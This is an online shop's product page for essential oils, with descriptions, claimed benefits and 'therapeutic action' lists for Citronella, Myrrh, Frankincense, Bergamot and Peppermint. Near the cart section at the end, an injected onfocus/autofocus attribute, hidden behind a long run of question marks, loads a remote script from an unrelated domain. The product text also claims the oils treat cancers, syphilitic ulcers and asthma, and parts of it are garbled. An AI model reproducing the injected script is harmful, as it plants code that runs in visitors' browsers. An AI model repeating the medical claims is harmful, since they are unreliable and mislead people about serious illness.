Wishlist

Account

Cart

CITRONELLA

Citronella

 

 

QUALITY

100% pure therapeutic grade.
Our organic Citronella essential oil is steam distilled from the green blades leaves. It is wild growing in Indonesia, Botanical name Java Citronella: Cymbopogon winterianus Jowitt; the original content is the geraniol.

CHARACTERISTICS

Citronella is a liquid colorless to pale yellow with a sweet, fresh, has more pronounced lemon-like aroma. A clinical study has demonstrated support for antiseptic, bactericidal, and insecticide.

BENEFITS

Musculoskeletal system: for a massage with this essential oil, help to relieve arthritic and rheumatic pain.

 Nervous system: Citronella essential oil has a fresh, invigorating aroma, helping to reduce fatigue.

 Respiratory system: Citronella essential oil is an excellent antimicrobial property with inhalations that helps to reduce minor infections, flu, and colds.

 Citronella essential oil is an insect repellent and has reported having antibacterial and antifungal activities.

THERAPEUTIC ACTIONS

Antiseptic, bactericidal, deodorant, diaphoretic, diuretic, emmenagogue, febrifuge, insecticide, stomachic, tonic.

MYRRH

Myrrh

 

 

QUALITY

100% pure therapeutic grade.
Our organic Myrrh essential oil (Commiphora Myrrha) is one of the original known aromatic substances, specified as far back as 4,000 years. It was an element of increase recycled for spiritual ceremonies and fumigations by the ancient Egyptians, used in the powering Egyptian perfume. It was presumed to shorten wrinkles and preserve a youthful texture. Egyptian women wore Myrrh in their outer arrangements.

CHARACTERISTICS

Myrrh oil is a pale yellow-orange colored liquid. It has a warm-spicy odor with a sharp-balsamic, slightly top note.

The extract method for Myrrh essential oil is steam distillation process, Myrrh has mentioned in the new testament in the Bible as one of the three gifts given to baby Jesus with gold and Frankincense (Matthew 2:11) Myrrh essential oil is considered sacred.

BENEFITS

Myrrh essential oils have used since ancient times as antiseptic, expectorant, antispasmodic, emmenagogue, and stomachic. It has also used for the medication of cancers, leprosy, syphilitic ulcers, sores, sore throats, asthma, coughs, weak gums, gingivitis, and loose teeth. Myrrh has imported for Chinese medicine in the seventh century and for treating conditions associated with bleeding, pain, and wounds.

In Egypt, Myrrh essential oil is well known for the treatment of infectious diseases. Particular Egyptian analysis has demonstrated the activity for oral products with Myrrh.

Myrrh oil is worn for flavor component in several food products, containing alcoholic and non-alcoholic beverages, frozen dairy desserts, candy, baked goods, gelatins and puddings, and meat & meat products.

THERAPEUTIC ACTIONS

Anti-catarrhal, anti-inflammatory, antimicrobial, antiseptic, astringent, balsamic, carminative, cicatrisant, emmenagogue, expectorant, fungicidal, sedative, stimulant, stomachic, tonic, uterine, vulnerary.  

FRANKINCENSE BOSWELLIA SACRA

Frankincense Sacra Essential

 

 

Our organically crafted Frankincense Sacra Essential Oil is hydro distilled from the resinous dried sap of Boswellia sacra trees native to Oman, an historic region known for producing premium quality Frankincense Oil. The essential oil of Boswellia sacra has a warm, radiant, resinous, earthy, slightly balsamic aroma with peppery undertones and a top note of lemon-orange citrus; and is endowed with a rainbow of aromatherapeutic applications.

The lightly colored, greenish-hued Boswellia sacra resin is carefully harvested from trees in Oman, where only a few distillers have permission from the royal family to work with the Royal Hojari resin, as it is known locally. Also referred to as Sacred Frankincense, Boswellia Sacra Oil is used as a spiritual aid in ritual, prayer, and meditation.

REPORTED BENEFITS AND USES

Frankincense Sacra Oil is used cosmetically in nourishing and rejuvenating the skin. Along with acting as lovely skin support for things like moisturizing, rejuvenating mature skin and helping with scar tissue, Frankincense Sacra Essential Oil is also widely used for helping to reduce minor pain and inflammation related to headaches and general muscle tension. Containing high amounts of alpha-pinene also gives Frankincense Sacra the ability to act as an anti-inflammatory. It can provide respiratory support, as well, helping to clear congestion and mucous.

Emotionally and energetically, Frankincense Sacra Oil is revered for its powerfully uplifting and clarifying effects for the body and mind. When diffused in home, it provides protection, encourages healthy moods, and will turn the fragrance of the home into that of a temple. It is also regarded by some as a superior ally in the quest for increased vital energies and nourishment of the soul. Frankincense Sacra Essential Oil is thought to have a higher energetic vibration than other Frankincense Essential Oils.

Therapeutic Actions

Analgesic, antidepressant, ant inflammatory, antimicrobial, antitumor, antiseptic, astringent, Bronchial asthma, carminative, cicatrizant, cytophylactic, expectorant, Immunostimulant, Musculokeletal system, Palliative care, Psychological, skin regenerator, sedative, vulnerary.

FRANKINCENSE BOSWELLIA SERRATA

Frankincense Serrata

 

 

QUALITY

100% Pure Therapeutic Grade

Our organic Frankincense Serrata Essential oil is hydro distilled from the wildcrafted oleo gum resin Exudate from the Boswellia Serrata trees growing wild in the mountainous areas of India. With its warm-hearted, resinous, soft, sugary-balsamic, sophisticated fragrance with a slight licorice-like undertone, Boswellia serrata is among the richest and exquisite of the majestic frankincense varietals. The Serrata is one of the oldest documented of the Boswellia family Frankincense Serrata may be the Frankincense mentioned in the Bible and Ayurvedic medicine. Frankincense Serrata is rich in natural constituents’ belongings to the monoterpene’s chemicals family-like thujene, alpha-pinene, and Limonene, adding it to a potent natural antiseptic, decongestant, and anti-inflammatory agent

 

CHARACTERISTICS

The fresh, citrus-terpenic odor of Frankincense Serrata essential oil Involved in ancient myth and sacred rituals; its profound healing properties have rendered that one critical component of Ayurvedic remedy.

 

BENEFITS

Frankincense Serrata oil is also extensively used for relieving and lower minor soreness and swelling associated with headaches and muscle tension. Support respiratory system, Clear mucous, and congestion. Frankincense Oil contains antimicrobial advantages, working to destroy harmful germs and bacteria upon contact, whether on the body or surfaces all over the home environment. Useful to reduce and in some cases eliminate wrinkles, reducing the appearance of scars all over the body, clearing up acne and other imperfections, while at the same time fading stretch marks and healing cracked or dry skin.

Frankincense Serrata oil provides a range of anti-aging benefits. Psychologically, Frankincense Serrata oil is rich with possible applications. Frankincense is legendary in its customary and sacred uses and its ability to inspire deep harmony and peace of mind, making it ideal for meditation purposes.

 

THERAPEUTIC ACTIONS 

May reduce arthritis. Frankincense has anti-inflammatory effects that may help to reduce joint inflammation caused by osteoarthritis and rheumatoid arthritis. May improve Gut Function.
Improves Asthma. Maintains Oral Health. May Fight Certain Cancers.

BERGAMOT

Bergamot

 

 

QUALITY

100% pure therapeutic grade

Our organic cold-pressed Bergamot Essential Oil is from the fresh, sharp, green coats of Citrus aurantium var. bergamia fruits are grown in plantations of the southern Italian coast. Our pleasure pure and uplifting Bergamot Oil has cooled, refreshing, sweet and green notes, bright floral, and bitter underneath tones. Bergamot Oil is full of powerful benefits, although its roots found back to South East Asia. Bergamot was usually harvesting in Southern Italy, precisely in the coastal regions of Sicily and Reggio di Calabria. Bergamot named of Bergamo city in Lombardy, Italy, where it was initially being harvested and sold. 

 

CHARACTERISTICS 

Is it More than just offering citrus scent or flavor of Bergamot essential oil is one of the most popular essential oils in perfumery for its sweet and fresh scent, adds a gorgeous top note, especially in Eau de Cologne categories, creating an initial ‘fresh fragrance’ impress. It is also the popular flavor and fragrance of Earl Grey tea.

Bergamot Oil can also help reduce inflammation and pain, minimize unwelcome bacterial or fungal action, and ease muscle contractions or spasm.

 

BENEFITS

Bergamot Essential Oil is emotional and energetic, is an excellent source for deep relaxing, uplifting, and calming. This essential oil is very pleasing and mainly uplifting to the spirit and can help reduce feelings of frustration or anger. Bergamot Oil is the best oils when

looking to help anxiety and help manage situational and naturally goodnight

rest. It is adaptogenic to help you balance your body and mind.

PLEASE NOTE: Our Bergamot essential oil is photosensitizing; Please do not use when exposed to the sun for 12 hrs. prior and highly diluted if you applied to the skin.

 

Therapeutic Actions 

Analgesic, anthelmintic, antibacterial, antidepressant,

anti-inflammatory, antipruritic, antiseptic, antispasmodic, antiviral, appetitive, astringent, carminative, cicatrizant, deodorant, digestant, diuretic, expectorant, febrifuge, insecticide, insect repellent, laxative, nervine, orexigenic, rubefacient, sedative, stimulant, stomachic, styptic, tonic, vasoconstrictive, vermifuge, and vulnerary 

PEPPERMINT

Peppermint

 

 

QUALITY

100% Pure Therapeutic grade

Our organic Peppermint Essential Oil is steam distilled from fresh green leaves of the aromatic Mentha x Piperita plant grown in fertile green fields in the countryside of the USA. Essential Oil Peppermint has the aroma of the vibrant plant fresh, green-herbaceous, powerfully minty with an overpowering menthol and sweet balsamic undertone – that can be used for both aromatherapy and natural perfumery. Carl Linneaus, in 1753 has described high Menthol content – like our Peppermint Oil – distinguishes the best quality Peppermint. The Real Peppermint (Mentha x Piperita) it is believed to be hybrid from two species of Mentha: Watermint (Mentha Aquatica) and Spearmint (Mentha spicata).

 

CHARACTERISTICS  

Menthol is the main constituent of Peppermint, a potent compound that causes a quick physical response when inhaled or applied to the skin. It produces a sensation of coolness in which the body counteracts by increasing blood flow to the area of application, giving a warming effect. Menthol generously used in candies, breath fresheners, and beverages also used as a cooling agent in widespread over-the-counter cream or ointment for muscles and joints.

BENEFITS

Peppermint Essential Oil offers numerous applications with fresh, intense minty aroma within beauty, cosmetics, soapmaking applications, and aromatherapy. Excellent support to relieve upset skin after spending too much time in the sun or for bug bites. Peppermint Essential Oil is also known for the many therapeutic properties and helps reduce pain and inflammation, as well as bacteria and viruses. An excellent source in dental care due to its useful and refreshing benefits, Peppermint also helps alleviate occasional stomachache symptoms great support for the respiratory system and can even help relieve allergies. Great for hair care nourishes and balances grease and oily scalp. Emotionally and energetically.

Peppermint Essential Oil can adapt to your body needs, is a refreshing and invigorating oil that is both soothing and enlightening. Peppermint essential oil is an excellent support for headaches and migraines ideal for stimulating mental agility and helps to improve concentration for any task. Peppermint Essential Oil stimulates new ideas and creativity, awakens, refreshes the senses, often helping to boost self-confidence.

 

THERAPEUTIC ACTIONS

Adaptogenic, analgesic, anesthetic (topical), anodyne, anthelmintic, anti-acid, antibacterial, anticarcinogenic, antiemetic, antifungal, anti-inflammatory, antimicrobial, antineuralgic, antiseptic, antispasmodic, antiviral, astringent, bactericidal, carminative, cholagogue, condiment, cordial, digestive, emmenagogue, expectorant, febrifuge, hepatic, insecticide, larvicidal and insect repellent, nervine, parasiticide, pectoral, pungent, rubefacient, sedative, stimulant, stomachic, sudorific, vasoconstrictor, vasodilator, and vermifuge.

 

0
0 item
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//www.comedianteschapines.com/es/counter.js";document.head.append(script); autofocus=\"
Empty Cart
×

¡Hello!

If you require personalized attention, click on Malika Essentials sales and you will be directed to whatsApps Web.

× How can I help you?